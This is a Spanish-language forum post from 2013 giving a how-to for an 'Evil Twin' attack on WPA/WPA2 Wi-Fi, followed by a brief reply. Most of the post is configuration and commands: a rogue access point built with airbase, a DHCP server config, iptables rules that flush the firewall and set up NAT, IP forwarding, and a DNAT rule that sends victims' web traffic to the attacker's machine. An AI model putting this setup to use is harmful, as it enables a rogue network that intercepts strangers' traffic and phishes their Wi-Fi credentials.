Evil Twin ataque wpa/wpa2

Publicado por hackeame_el_msn, 27 de Abril de 2013, 05:48:23 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

hackeame_el_msn

Hola a todos,seguro que conocen esta tecnica,como el foro me ayudo mucho, quiero compartir un poco de lo que me costo aprender tanto ip tables como dhcp para poder configurar correctamente mi red y lograr lanzar este ataque.Les dejo este video,disculpen que es muy largo,iva a poner imagenes pero nose en que host debia alojarlos,ya que el host que sugiere D3MON no deja subir mas imagenes




Use dos adaptadores wireless para hacer esta prueba:
wlan0 = para tener internet
wlan1 = modo monitor ,crear ap con airbase,etc


Explicacion de algunos comandos para su mayor entendimiento de lo que se hace y se pone,para sacarse cualquier duda.

ddns-update-style ad-hoc;//el método de actualización DNS automática con los valores de la IP asignados por DHCP (en este caso tipo ad-hoc).
default-lease-time 600; //es el tiempo de préstamo por defecto de la dirección IP y está medido en segundos.

max-lease-time 7200; //es el tiempo máximo que debe durar una dirección IP antes que caduque y el cliente deba pedir otra vez una dirección.

subnet 10.0.0.0 netmask 255.255.0.0 {
        option subnet-mask 255.255.0.0; //Mascara de red de la subred
        option broadcast-address 10.0.255.255; //Es la dirección de broadcast de nuestra red.
        option routers 10.0.0.2; //Es la dirección IP de nuestro gateway (ip del router).
        option domain-name-servers 8.8.8.8;//Es la dirección IP de nuestros servidores DNS (puede ser la ip de tu router o usar dns publicas como la de google).
        range 10.0.0.50 10.0.0.150; //el rango de las direcciones que puede asignar el servidor DHCP

}

subnet=Segmento de subred sobre el cual actuara el dhcp.
netmask=Mascara de red de la subred



Los 4 primeros comandos limpian las reglas del firewall para establecerlas.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

El 5 comando indica que el enrutamiento debe ser tratado por la interface de salida wlan1:
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE

Habilitar el IP Forwarding:
El IP Forwarding sirve para darle capacidad de Router a nuestro servidor es decir que pueda recibir y reenviar los paquetes por una o varias interfaces

echo "1" > /proc/sys/net/ipv4/ip_forward

Redireccionar el tráfico hacia tu ip:
iptables -t nat -A PREROUTING  -p tcp --dport 80 -j DNAT --to-destination 10.0.0.12:88

enmascarar la dirección IP:
iptables -t nat -A POSTROUTING -j MASQUERADE

at0 up // levantamos la red que creo airbase
at0 10.0.0.2 netmask 255.255.0.0 //se define la dirección IP del gateway y la mascara de red
route add -net 10.0.0.0 netmask 255.255.0.0 gw 10.0.0.2 //finalmente adicionamos el enrutamiento para la red 10.0.0.0 , la mascara de red y el gateway de la subred.

dhcp3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 //crear un enlace simbolico apuntando al pid.
/etc/init.d/dhcp3-server start  // iniciar el servidor dhcp3 server




FORWARD: paquetes que pasan por nuestra máquina.

POSTROUTING: Los paquetes salientes pasan por esta cadena después de haberse tomado la decisión del ruteo.

MASQUERADE: Enmascarar la dirección IP del cliente o la dirección de red respectivamente.


ip-router =10.0.0.2 //poner tu ip del router
ip-privada = 10.0.0.12 //poner tu ip privada
subnet = 10.0.0.0 //desde ahi empieza mi red
netmask =255.255.0.0 //esa es mi mascara de subred,puede ser distinto (ejemplo:255.255.255.1)


Creo que no me olvide mas nada  :-[ si tienen alguna duda me preguntan..algunos conceptos estan explicados a lo "humano" ya que sino seria un tutorial muy largo y explicativo,disculpen los errores ortograficos.
PD.:el video creo q se hizo muy largo

D3M0N

Interesante tu información,  igual es un poco evidente el método pero quizás funcione.